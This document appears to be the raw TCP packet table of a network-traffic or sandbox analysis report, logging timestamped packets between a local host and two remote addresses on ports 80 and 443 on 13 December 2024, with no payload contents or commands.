                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.122852087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.123771906 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.123795986 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.123822927 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.123836040 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.124887943 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.124898911 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.124923944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.124948025 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.125886917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.125935078 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.125962973 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.126005888 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.126977921 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.127012968 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.127310991 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.127360106 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.128113031 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.128173113 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.128177881 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.128226042 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.129239082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.129282951 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.129323006 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.129374981 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.130249023 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.130292892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.130331993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.130372047 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.131361008 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.131409883 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.131442070 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.131480932 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.132433891 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.132483959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.132531881 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.132531881 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.133510113 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.133549929 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.133594990 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.133665085 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.134632111 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.134673119 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.134677887 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.134721041 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.135660887 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.135709047 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.135754108 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.135799885 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.136794090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.136841059 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.136972904 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.137018919 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.273719072 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.273778915 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.273819923 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.273858070 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.274183035 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.274221897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.274300098 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.274346113 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.275265932 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.275321960 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.275391102 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.275433064 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.276401043 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.276449919 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.276526928 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.276565075 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.277453899 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.277467012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.277499914 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.277513027 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.278574944 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.278623104 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.278631926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.278685093 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.279694080 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.279736996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.279828072 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.279866934 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.280728102 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.280803919 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.280853987 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.280905008 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.281811953 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.281856060 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.281929016 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.281965971 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.283086061 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.283127069 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.283225060 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.283267975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.284059048 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.284120083 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.284143925 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.284188032 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.284989119 CET44349764116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.285039902 CET49764443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.285048008 CET44349764116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.285058022 CET44349764116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.285096884 CET49764443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.285155058 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.285195112 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.285284996 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.285321951 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.286189079 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.286231041 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.286284924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.286328077 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.287230015 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.287271976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.287333012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.287369967 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.288311005 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.288351059 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.288436890 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.288479090 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.289433956 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.289477110 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.289532900 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.289581060 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.290467978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.290529966 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.290637016 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.290673018 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.291589975 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.291639090 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.291697025 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.291734934 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.292659998 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.292700052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.292705059 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.292738914 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.293757915 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.293802977 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.293891907 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.293934107 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.294820070 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.294867992 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.294930935 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.294971943 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.295918941 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.295962095 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.296015978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.296068907 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.296770096 CET49764443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.296782017 CET44349764116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.297261000 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.297310114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.297314882 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.297380924 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.298305988 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.298345089 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.298378944 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.298418045 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.299392939 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.299453974 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.299462080 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.299499989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.300688028 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.300734043 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.300767899 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.300807953 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.301692009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.301742077 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.301820993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.301860094 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.302592039 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.302637100 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.302721977 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.302764893 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.303667068 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.303715944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.303721905 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.303783894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.304675102 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.304723024 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.304750919 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.304791927 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.305732012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.305803061 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.305960894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.306003094 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.306879044 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.306934118 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.307018042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.307106972 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.307862997 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.307904959 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.308017015 CET49770443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.308037043 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.308051109 CET44349770116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.308077097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.308124065 CET49770443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.308316946 CET49770443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.308327913 CET44349770116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.308964968 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.309012890 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.309043884 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.309082985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.310050964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.310094118 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.310204029 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.310247898 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.311139107 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.311182976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.311216116 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.311264038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.312325954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.312366009 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.312429905 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.312470913 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.313446999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.313498974 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.313556910 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.313595057 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.314537048 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.314579964 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.314623117 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.314665079 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.315505028 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.315562010 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.315630913 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.317094088 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.317123890 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.317153931 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.317168951 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.317672968 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.317795038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.317809105 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.317863941 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.318917036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.318962097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.318989992 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.319032907 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.319957972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.319974899 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.320002079 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.320018053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.320935011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.320988894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.321063995 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.321110010 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.322058916 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.322148085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.322166920 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.322182894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.323168993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.323185921 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.323242903 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.324271917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.324318886 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.324368000 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.324438095 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.325452089 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.325495958 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.325568914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.325612068 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.326493979 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.326536894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.326560974 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.326606035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.327425003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.327452898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.327476978 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.327486038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.328519106 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.328567028 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.328651905 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.328696966 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.329606056 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.329665899 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.329708099 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.329751015 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.330651999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.330694914 CET4976380192.168.2.431.41.244.11
